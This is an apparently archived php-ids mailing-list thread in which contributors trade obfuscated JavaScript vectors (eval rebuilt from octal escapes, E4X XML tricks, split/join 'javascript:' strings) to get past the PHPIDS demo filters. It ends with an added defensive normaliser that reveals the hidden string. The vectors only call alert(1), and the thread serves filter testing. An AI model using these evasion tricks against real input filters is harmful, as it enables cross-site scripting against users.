By the way, I just tried the demo javascript (minus the script tags)
at demo.php-ids.org... It triggered 16 filters and a score of 71!
On Sep 16, 4:31 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> @David: Sounds interesting but I can't find the link.
>
> "DAMN! What a screwy language." (cite from p42 page)
> Yes - I totally agree with you. Xorrer's latest vectors prove that once again
> ;)
>
> Greetings,
> .mario
>
> 2007/9/16, thornmaker <thornma...@gmail.com>:
>
> > This is only partially related to the IDS, but working on these
> > injections inspired me to put together a demo page of some of the
> > weird stuff you can do with javascript. There is a brief writeup on
> > my site at http://p42.us/ including the link to the demo text. I had
> > to leave some of the obfuscation techniques out because I want it to
> > work in both Firefox and IE. Please let me know if you have any
> > suggestions for improvements!
>
> > By the way, I just tried the demo javascript (minus the script tags)
> > at demo.php-ids.org... It triggered 16 filters and a score of 71!
>
> --
> _______________________
> php-ids.org
I think Mario was updating the filters when I tried this one so it
didn't get through, if I had more time I'd write another one but I'm
sure someone else will be able to use this idea
On Sep 16, 9:55 pm, thornmaker <thornma...@gmail.com> wrote:
> Hmm... I'll see about making the link more clear. In the meantime,
> try this: http://p42.us/stuff/wtf.txt
> and to see how it executes: http://p42.us/stuff/wtf.html
>
> On Sep 16, 4:31 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
> wrote:
>
> > @David: Sounds interesting but I can't find the link.
>
> > "DAMN! What a screwy language." (cite from p42 page)
> > Yes - I totally agree with you. Xorrer's latest vectors prove that once again
> > ;)
>
> > Greetings,
> > .mario
>
> > 2007/9/16, thornmaker <thornma...@gmail.com>:
>
> > > This is only partially related to the IDS, but working on these
> > > injections inspired me to put together a demo page of some of the
> > > weird stuff you can do with javascript. There is a brief writeup on
> > > > my site at http://p42.us/ including the link to the demo text. I had
You were right. http://groups.google.com/group/php-ids/msg/74ba23034387d28d
Cool stuff man! I knew it :D
On Sep 17, 10:08 am, xorrer <obhvsbypqg...@gmail.com> wrote:
> @Gareth
>
> You were right. http://groups.google.com/group/php-ids/msg/74ba23034387d28d
x=eval,1,1,1;1;
1,1,1,b='\\',1,1,1;
1,1,1,s='\'',1,1,1;
1,1,1,o='0',1,1,1;
x( x(s+b+141+b+154+b+145+b+162+b+164+b+o+50+b+o+61+b+o+51+s) );
I thought this was cool, it gets a score of 5:-
new Image().src= !null?'javascriptz:zalertz(1)'['split']('z')['join']([]):0
I'd get it to work around the filters but I can't be arsed plus I've got
a lot on. Tested under Opera, may work in IE though
On Sep 18, 1:17 pm, Gareth <gazhe...@gmail.com> wrote:
> Eval + Unicode attack:-
>
> x=eval,1,1,1;1;
> 1,1,1,b='\\',1,1,1;
> 1,1,1,s='\'',1,1,1;
> 1,1,1,o='0',1,1,1;
> x( x(s+b+141+b+154+b+145+b+162+b+164+b+o+50+b+o+61+b+o+51+s) );
>
> On Sep 18, 4:41 am, thornmaker < thornma...@gmail.com> wrote:
>
> > good stuff everyone. it's fun having new things to play with
>
> > On Sep 17, 9:56 am, Gareth < gazhe...@gmail.com> wrote:
>
> > > More XML based stuff:-
> > > a=<r><s>eva</s><s>l</s><a>ale</a><a>rt</a><a>(1)</a></r>
> > > 0[a.s.text()](a.a.text()+'')
>
> > > On Sep 17, 12:27 pm, Gareth <gazhe...@gmail.com> wrote:
>
> > > > This one is cool:-
> > > > > o={x:''+<s>eva</s>+<s>l</s>,y:''+<s>aler</s>+<s>t</s>+<s>(1)</s>};function f() { 0[this.x](this.y ) }f.call(o);
>
> > > > On Sep 17, 10:21 am, Gareth <gazhe...@gmail.com> wrote:
>
> > > > > @xorrer I'm on MSN Messenger if you're interested in a new contact :)
>
> > > > > On Sep 17, 10:11 am, Gareth <gazhe...@gmail.com> wrote:
>
> > > > > > @xorrer
>
> > > > > > Cool stuff man! I knew it :D
>
> > > > > > On Sep 17, 10:08 am, xorrer <obhvsbypqg...@gmail.com> wrote:
>
> > > > > > > @Gareth
>
> > > > > > > > You were right. http://groups.google.com/group/php-ids/msg/74ba23034387d28d
>
> > > > > > > On Sep 17, 12:27 am, Gareth <gazhe...@gmail.com> wrote:
>
> > > > > > > > Here's one that didn't work but you might find the xml tags
> > > > > > > > interesting:-
> > > > > > > > > s1=<s>evalalerta(1)a</s>,s2=<s></s>+'',s3=s1+s2,e1=/s/!=/s/?s3[0]:0,e2=/s/!=/s/?s3[1]:0,e3=/s/!=/s/?s3[2]:0,e4=/s/!=/s/?s3[3]:0,e=/s/!=/s/?0[e1+e2+e3+e4]:0,a1=/s/!=/s/?s3[4]:0,a2=/s/!=/s/?s3[5]:0,a3=/s/!=/s/?s3[6]:0,a4=/s/!=/s/?s3[7]:0,a5=/s/!=/s/?s3[8]:0,a6=/s/!=/s/?s3[10]:0,a7=/s/!=/s/?s3[11]:0,a8=/s/!=/s/?s3[12]:0,a=a1+a2+a3+a4+a5+a6+a7+a8,1,e(a)
>
> > > > > > > > I think Mario was updating the filters when I tried this one so it
> > > > > > > > didn't get through, if I had more time I'd write another one but I'm
> > > > > > > > sure someone else will be able to use this idea
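
The "Eval + Unicode" snippet quoted in this thread assembles its string from single-character variables and numbers, so the raw text never contains the keyword a signature would look for. The following is an added example, not part of any post here and not PHPIDS code: it folds the constant concatenation and decodes the octal escapes without evaluating anything. The function names and the `WATCH` pattern are hypothetical.

```javascript
// Added example (not PHPIDS code): statically normalise the "Eval + Unicode"
// snippet so a signature can see the string it assembles. Nothing is evaluated.
const SAMPLE = String.raw`x=eval,1,1,1;1;
1,1,1,b='\\',1,1,1;
1,1,1,s='\'',1,1,1;
1,1,1,o='0',1,1,1;
x( x(s+b+141+b+154+b+145+b+162+b+164+b+o+50+b+o+61+b+o+51+s) );`;

const TERM = String.raw`(?:[A-Za-z_$][\w$]*|\d+|'(?:\\.|[^'\\])*')`;
const CHAIN = new RegExp(`${TERM}(?:\\s*\\+\\s*${TERM})+`, "g");
const unquote = (body) => body.replace(/\\(.)/g, "$1"); // handles \\ and \' only

// Step 1: record bindings of the form name='literal'.
function collectBindings(src) {
  const env = new Map();
  const re = /\b([A-Za-z_$][\w$]*)\s*=\s*'((?:\\.|[^'\\])*)'/g;
  for (const m of src.matchAll(re)) env.set(m[1], unquote(m[2]));
  return env;
}

// Step 2: fold a+b+141 chains; numbers become their decimal text, as they do
// when concatenated to a string. Chains with unknown names are left alone.
function foldConcats(src, env) {
  return src.replace(CHAIN, (chain) => {
    const parts = chain.match(new RegExp(TERM, "g")).map((t) => {
      if (/^\d/.test(t)) return t;
      if (t[0] === "'") return unquote(t.slice(1, -1));
      return env.has(t) ? env.get(t) : null;
    });
    return parts.includes(null) || /^\d/.test(chain) ? chain : parts.join("");
  });
}

// Step 3: decode octal (\141), hex (\x61) and unicode (\u0061) escapes.
function decodeJsEscapes(text) {
  const re = /\\(?:u([0-9a-fA-F]{4})|x([0-9a-fA-F]{2})|([0-3][0-7]{0,2}|[4-7][0-7]?))/g;
  return text.replace(re, (m, uni, hex, oct) =>
    String.fromCharCode(oct !== undefined ? parseInt(oct, 8) : parseInt(uni || hex, 16)));
}

function normalise(src) {
  return decodeJsEscapes(foldConcats(src, collectBindings(src)));
}

// Hypothetical signature, standing in for a real filter rule.
const WATCH = /\balert\s*\(/;
console.log(WATCH.test(SAMPLE), WATCH.test(normalise(SAMPLE))); // false true
```

The folding step only handles quoted-literal bindings and `+` chains that start with a string; the `split`/`join` and E4X variants posted in this thread would need their own normalisation rules.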